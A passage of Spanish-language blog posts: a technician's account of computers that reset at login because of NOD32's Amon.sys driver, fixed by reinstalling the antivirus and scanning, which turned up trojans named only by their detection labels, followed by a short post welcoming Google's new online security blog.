al día siguiente un cliente al que le habíamos cambiado un modulo de memoria RAM no hablo para decirnos que tenia un problema (a lo cual yo pensé "Felicidades yo tengo mucho y no me quejo") que la maquina a la que le habíamos puesto el modulo de RAM se apagaba antes de que pudieran entrar...
me Lo primero que pensé fue bolas, el modulo de RAM salio dañado... y pus hay voy con mis discos para checar la RAM, el hardware y cuanta cosa pudiera fallar. Al momento de arrivar inicie el procedimiento de revisión de la memoria RAM y pues el resultado no daba lugar a dda, el modulo de RAM estaba funcionando bien.... Entonces encendí la computadora, y al momento de llegar al login, bang que esta se resetea y sin decir nada osea que no mostró su pantallazo... Bien entre en modo a prueba de fallos y configure para que no se reiniciara estomáticamente, lo cual permitió ver que en efecto el culpable era otra vez "Amon.sys".
En este punto ya las cosas no se ven muy alentadoras, y pues le volví a aplicar l misma medicina, desinstalar el NOD y volverlo a instalar, actualizarlo y darle una pasada de bajo nivel al sistema. El resultado.. pues unos 20 archivos infectados más o menos...

Pero esto empezó ha tornarse epidémico el día de hoy, cuando una de las máquinas del ciber comenzó a mostrar los mismos síntomas... se reiniciaba en el login...

no dude en que fuera lo mismo y acerté, tras la desinstalación del nod 32 la compu funciono...

esta vez me tome la molestia de ver quienes eran los culpable y aquí se los dejo a continuación

Win32/Trojandownloader.Small.AVT.
Win32/Trojandownloader.Neurech.nbc
Win32/NUWAR.GEN (Gusano) //Este ultimo lo encontró por medio de la heurística o lo que es lo mismo no esta en la base de datos de definiciones....

en la ultima compu solo hubo 7 archivos infectados, por lo tanto no hay a quien más echarle la culpa...

Así que si son usuarios de NOD 32 y su computadora no arranca o más bien se resetea al momento de iniciar, la medicina es desinstalar el nod y volverlo a instalar, actualizarlo y hacer un escaneo profundo....

por cierto en todos los casos l puerta por la que entraron todos los virus fue si adivinaron Internet Explorer...

Espero que esto les sirva a ustedes tanto como a Mi.

Un saludo

"Online security is an important topic for Google, our users, and anyone who uses the Internet. The related issues are complex and dynamic and we've been looking for a way to foster discussion on the topic and keep users informed. Thus, we've started this blog where we hope to periodically provide updates on recent trends, interesting findings, and efforts related to online security. Among the issues we'll tackle is malware, which is the subject of our inaugural post."


http://googleonlinesecurity.blogspot.com/

Así versa la primer entrada del nuevo blog de seguridad de google, espero que nos den buenos consejos acerca de protección sobre nuestras computadoras.

Este blog nos deja ver que google esta comenzando a preocuparse por la seguridad de sus usuarios, y que busca maneras de mantenernos informados.

Lo único malo para muchos de los usuarios de habla hispana es que esta en ingles, pero tratare de vez en cuando de poner algunas entradas traducidas, claro citando la fuente original...

Saludos

Aquí a quedado otra historia más de Internet Explorer y su servidor, en la cual esta vez gane....

Un saludo